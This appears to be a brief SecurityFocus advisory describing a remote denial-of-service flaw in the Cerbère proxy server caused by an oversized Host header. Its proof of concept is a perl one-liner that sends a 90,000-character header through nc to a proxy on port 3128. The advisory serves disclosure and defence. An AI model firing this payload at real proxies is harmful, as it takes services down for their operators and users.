Cerbère Proxy Server Long Host Header Field Remote Denial of Service Vulnerability

No exploit is required.

The following proof of concept is available:
perl -e 'print "GET / HTTP/1.1\r\n" . "Host: " . "A" x 90000 . "\r\n" . "\r\n\r\n" ' | nc "Proxy_IP" 3128


 

Privacy Statement
Copyright 2010, SecurityFocus